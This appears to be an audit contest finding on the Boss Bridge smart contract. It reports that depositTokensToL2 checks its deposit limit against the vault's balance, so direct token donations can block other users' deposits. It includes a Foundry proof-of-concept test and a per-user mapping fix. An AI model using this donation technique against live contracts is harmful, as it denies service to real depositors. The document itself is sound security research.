Submission Details
Severity: high
Valid

Malicious actor can DOS attack depositTokensToL2

Summary

A malicious actor can launch a DoS attack against depositTokensToL2.

Vulnerability Details

The function depositTokensToL2 enforces a deposit limit that caps the amount of funds that a user can deposit into the bridge, as shown here:

    if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {
        revert L1BossBridge__DepositLimitReached();
    }

https://github.com/Cyfrin/2023-11-Boss-Bridge/blob/1b33f63aef5b6b06acd99d49da65e1c71b40a4f7/src/L1BossBridge.sol#L71

The problem is that the check uses the vault's token balance to track this invariant. A malicious actor can therefore donate tokens directly to the vault contract so that the deposit limit is reached, causing a potential victim's harmless deposit to revert unexpectedly. See the modified Foundry test below:

    function testUserCannotDepositBeyondLimit() public {
        // Attacker (user2) donates tokens straight to the vault, bypassing the bridge.
        vm.startPrank(user2);
        uint256 DOSamount = 20;
        deal(address(token), user2, DOSamount);
        token.transfer(address(vault), DOSamount); // plain transfer, no approval needed
        vm.stopPrank();

        // Victim deposits an amount that is below the limit on its own...
        vm.startPrank(user);
        uint256 amount = tokenBridge.DEPOSIT_LIMIT() - 9;
        deal(address(token), user, amount);
        token.approve(address(tokenBridge), amount);
        // ...but the donated balance pushes the check over DEPOSIT_LIMIT.
        vm.expectRevert(L1BossBridge.L1BossBridge__DepositLimitReached.selector);
        tokenBridge.depositTokensToL2(user, userInL2, amount);
        vm.stopPrank();
    }

Impact

Users will not be able to deposit tokens to the bridge in some situations.

Tools Used

Foundry

Recommendations

Use a mapping to track the deposit limit of each user instead of using the contract balance.
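
A sketch of this recommendation, added here as an example and not taken from the Boss Bridge repository: deposits are counted in a per-user mapping, so tokens transferred directly to the vault never enter the limit check. The names DepositLimitSketch and IERC20Minimal, the DEPOSIT_LIMIT value, and the simplified two-argument depositTokensToL2 signature are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal ERC-20 surface needed here (constructed for this example).
interface IERC20Minimal {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical sketch, not the Boss Bridge source: deposit accounting that
// ignores tokens sent straight to the vault.
contract DepositLimitSketch {
    error DepositLimitReached();
    error TransferFailed();

    event Deposit(address from, address to, uint256 amount);

    uint256 public constant DEPOSIT_LIMIT = 100_000 ether; // assumed value
    IERC20Minimal public immutable token;
    address public immutable vault;

    // Per-user running total, as the recommendation suggests.
    mapping(address => uint256) public deposited;

    constructor(IERC20Minimal _token, address _vault) {
        token = _token;
        vault = _vault;
    }

    function depositTokensToL2(address l2Recipient, uint256 amount) external {
        // Only amounts that passed through this function count toward the cap,
        // so a direct token.transfer(vault, x) donation cannot trip the check.
        uint256 newTotal = deposited[msg.sender] + amount;
        if (newTotal > DEPOSIT_LIMIT) revert DepositLimitReached();
        deposited[msg.sender] = newTotal; // effects before interaction

        if (!token.transferFrom(msg.sender, vault, amount)) revert TransferFailed();
        emit Deposit(msg.sender, l2Recipient, amount);
    }
}
```

A per-user cap does not bound the vault's total holdings, so if a global cap is the intended invariant, a single internal counter updated the same way serves that purpose. Either counter also needs to be decremented on withdrawal, otherwise the limit becomes a lifetime quota.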

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): DoS deposits via DEPOSIT_LIMIT
